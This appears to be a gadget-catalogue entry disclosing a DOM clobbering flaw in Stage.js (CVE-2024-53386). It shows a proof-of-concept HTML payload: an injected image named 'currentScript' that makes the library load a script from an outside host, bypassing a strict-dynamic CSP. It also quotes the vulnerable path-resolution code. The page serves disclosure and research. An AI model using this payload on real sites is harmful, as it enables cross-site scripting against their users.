.. / stage.js

Star Fork

Stage.js is a lightweight and fast 2D rendering and layout library for web and mobile game development.

≤0.8.10 | CVE-2024-53386

<img> @src 🛡️ strict-dynamic ⏱️ before-call

• The Stage.js library was using document.currentScript as a reference to load plugins.

  <!-- user input -->
  <img name="currentScript" src="https://gmsgadget.com/assets/xss/index.js">
  
  <script nonce="secret" src="https://cdnjs.cloudflare.com/ajax/libs/stage.js/0.8.10/stage.web.js"></script>
  <script nonce="secret">
    Stage.preload("./index.js");
  </script>

  Preview Copy

function getScriptSrc() {
  // HTML5
  if (document.currentScript) {
    return document.currentScript.src;
  }

  // [...]

  return function(url) {
    if (/^\.\//.test(url)) {
      var src = getScriptSrc();
      var base = src.substring(0, src.lastIndexOf('/') + 1);
      url = base + url.substring(2);
      // } else if (/^\.\.\//.test(url)) {
      // url = base + url;
    }
    return url;
  };

Related links:

• https://github.com/advisories/GHSA-fp3m-g5rc-4c28
• https://gist.github.com/jackfromeast/31d56f1ad17673aabb6ab541e65a5534
• https://github.com/jackfromeast/dom-clobbering-collection/blob/main/domc-gadgets/stage.js.md
• https://jackfromeast.github.io/assets/DOMinoEffect.pdf

Found by jackfromeast, ishmeals.

Source | History